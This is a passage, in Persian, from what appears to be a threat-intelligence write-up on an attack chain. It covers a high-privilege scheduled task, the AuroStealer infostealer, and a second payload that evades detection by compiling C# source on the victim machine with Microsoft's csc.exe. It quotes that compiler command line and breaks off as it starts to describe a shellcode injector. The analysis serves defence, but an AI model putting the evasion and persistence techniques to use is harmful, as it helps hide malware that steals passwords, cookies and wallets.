* این وظیفه با بالاترین سطح دسترسی (-RunLevel Highest) اجرا می‌شود، زیرا قربانی در ابتدا پاورشل را با دسترسی ادمین اجرا کرده است.

مرحله دوم: پی‌لود اصلی (AuroStealer)

* فایل updater.exe (با هش SHA256: 58b11b4d...) که توسط گزارش SANS به عنوان بدافزار AuroStealer (بر اساس Malpedia) شناسایی شده است.

۔* AuroStealer یک (InfoStealer) است که احتمالاً مبتنی بر .NET می‌باشد. این نوع بدافزارها به طور خاص برای سرقت اطلاعات حساس مانند کوکی‌های مرورگر، رمزهای عبور ذخیره شده، اطلاعات کارت‌های اعتباری و داده‌های مربوط به کیف پول‌های ارز دیجیتال طراحی شده‌اند.

مرحله سوم: پی‌لود ثانویه و تکنیک "خود-کامپایلی" (Self-Compiling)

* در نهایت، پی‌لود دومی به نام source.exe (با هش SHA256: db57e4a7...) دانلود و اجرا می‌شود.

* تکنیک پیشرفته (TTP): این بدافزار از یک تکنیک جالب برای فرار از شناسایی به نام "On-Demand Compilation" یا "Self-Compiling Malware" استفاده می‌کند.

1. بدافزار source.exe به جای حمل مستقیم کد مخرب نهایی، حاوی سورس کد C\# است.

2. سپس، کامپایلر قانونی و امضا شده مایکروسافت (csc.exe) را که بخشی از .NET Framework است، فراخوانی می‌کند:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline

3. این دستور، سورس کد موجود در فایل vpkwkdbo.cmdline را در لحظه بر روی سیستم قربانی کامپایل می‌کند.

* تحلیل کد C\# کامپایل شده: کد C\# کامپایل شده یک کلاس ساده به نام SC ایجاد می‌کند که یک Shellcode Injector کلاسیک است: